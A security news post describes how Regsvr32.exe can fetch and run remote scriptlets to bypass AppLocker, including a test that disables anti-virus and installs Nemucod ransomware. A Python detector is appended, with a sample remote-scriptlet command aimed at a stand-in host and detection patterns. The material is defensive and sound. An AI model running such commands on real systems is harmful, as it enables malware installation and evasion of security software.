
Regsvr32 can be used to install Ransomware through JScript Installers


Petrovic


A security researcher named Casey Smith published an article last week where he detailed how the Windows Regsvr32.exe command could be used to bypass AppLocker restrictions. In this article he described a not commonly known feature where Regsvr32 can execute specially crafted scripts on a remote host using a URL. These scripts are XML files that contain embedded JScript or VBScript scripts that will be executed when Regsvr32 runs the script.


This obviously leads to a whole mess of possibilities where an attacker can do very bad things to your computer as long as they have access to it. Unfortunately, there are many ways for an attacker to gain access to a computer, whether it be through an exploit kit or a vulnerability.


Regsvr32.exe installing Ransomware through JScript
As a test, I decided to take a ransomware JavaScript installer and modify it so that it can work with Regsvr32.exe. As the Nemucod ransomware relies heavily on JavaScript to install itself, I thought that this ransomware would be a good one to test with.


Using the instructions found in Casey Smith's article, I created a specially crafted XML file that contained the JavaScript from the Nemucod installer. I had to modify it a bit to get it to work properly with Regsvr32.exe, but that was easy enough to do. I then modified it further by adding a small script that creates a batch file in the %Temp% folder that is executed by the script before installing the ransomware. This batch file will terminate known anti-malware and anti-virus programs so that they are unable to block the ransomware from being installed.


Unfortunately, the test worked perfectly. Regsvr32.exe was able to execute my script using a URL to my test server. This script then terminated my running anti-virus software and installed the ransomware. In order to demonstrate this test, I created the video below that shows how I used Regsvr32.exe to install the Nemucod ransomware.


What makes this method worse is that it can be used to easily modify the system before installing malware. Using normally whitelisted programs, a VBScript or JScript script can easily make registry or system configuration changes, terminate security processes, and then install whatever malware they want. Furthermore, since Regsvr32.exe is a legitimate application and these remote script files can be named whatever you want, anti-virus software will not easily detect it.


Full Article
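The post describes three observable behaviours a defender can key on: Regsvr32.exe being handed a URL instead of a local DLL, Regsvr32.exe hosting a scriptlet rather than registering a COM server, and the script dropping and running a batch file from %Temp% before the payload lands. The following is an added detection example, not code from the post or from Casey Smith's research. It runs simple rules over constructed process-creation events (field names `parent`, `image`, `cmdline` are assumptions modelled on Sysmon-style logs, and the hostnames and paths are made up). The `/i:` switch and `scrobj.dll` are Regsvr32's documented install-string argument and Windows' scriptlet COM host; they are not named on the page but are the arguments through which remote scriptlet execution is normally observed.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample events (not real telemetry), shaped like process-creation
# logs: parent image, child image, and the child's command line.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # benign: a vendor installer registering a local DLL
    {"parent": "msiexec.exe", "image": "regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\codec.dll"'},
    # suspicious: install string is a URL and the COM server is the scriptlet host
    {"parent": "winword.exe", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://updates.example.invalid/a.sct scrobj.dll"},
    # suspicious: regsvr32 spawning cmd.exe to run a batch file out of %Temp%
    {"parent": "regsvr32.exe", "image": "cmd.exe",
     "cmdline": r'cmd.exe /c C:\Users\u\AppData\Local\Temp\pre.bat'},
    # benign: a user running a build script from %Temp% under explorer
    {"parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": r'cmd.exe /c C:\Users\u\AppData\Local\Temp\build.bat'},
]

# /i:<install string> where the install string is an http(s) URL
URL_INSTALL_ARG = re.compile(r'/i:\s*"?(https?://[^\s"]+)', re.IGNORECASE)
# a .bat file anywhere under a Temp directory
TEMP_BATCH = re.compile(r'\\Temp\\[^\s"]+\.bat\b', re.IGNORECASE)
# script/shell interpreters that regsvr32 has no legitimate reason to spawn
INTERPRETERS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe"}


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules this event triggers (empty when benign)."""
    hits: List[str] = []
    image = event["image"].lower()
    parent = event["parent"].lower()
    cmd = event["cmdline"]

    if image == "regsvr32.exe":
        # Rule 1: install string points at a remote host instead of a local path
        if URL_INSTALL_ARG.search(cmd):
            hits.append("regsvr32_remote_scriptlet_url")
        # Rule 2: the "DLL" being registered is the scriptlet host itself
        if "scrobj.dll" in cmd.lower():
            hits.append("regsvr32_scrobj_host")

    if parent == "regsvr32.exe" and image in INTERPRETERS:
        # Rule 3: regsvr32 normally has no children; an interpreter child is anomalous
        hits.append("regsvr32_spawned_interpreter")
        # Rule 4: the batch-file-in-%Temp% staging step described in the post
        if TEMP_BATCH.search(cmd):
            hits.append("temp_batch_from_regsvr32")

    return hits


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index every event that triggers at least one rule."""
    findings = []
    for idx, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings.append((idx, hits))
    return findings


if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)} :: {SAMPLE_EVENTS[idx]['cmdline']}")
```

Rule 1 is the direct signal for the behaviour the post demonstrates; rules 3 and 4 catch the staging step (the anti-virus-killing batch file) even if the scriptlet is fetched in some other way, and rule 2 fires on the scriptlet host regardless of where the install string points. Because the remote file can be named anything, none of these rules look at the file name, only at the launcher, its arguments, and the process tree. An AppLocker or WDAC policy that blocks Regsvr32.exe from loading scrobj.dll, plus egress filtering for outbound HTTP from regsvr32.exe, are the corresponding preventive controls.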
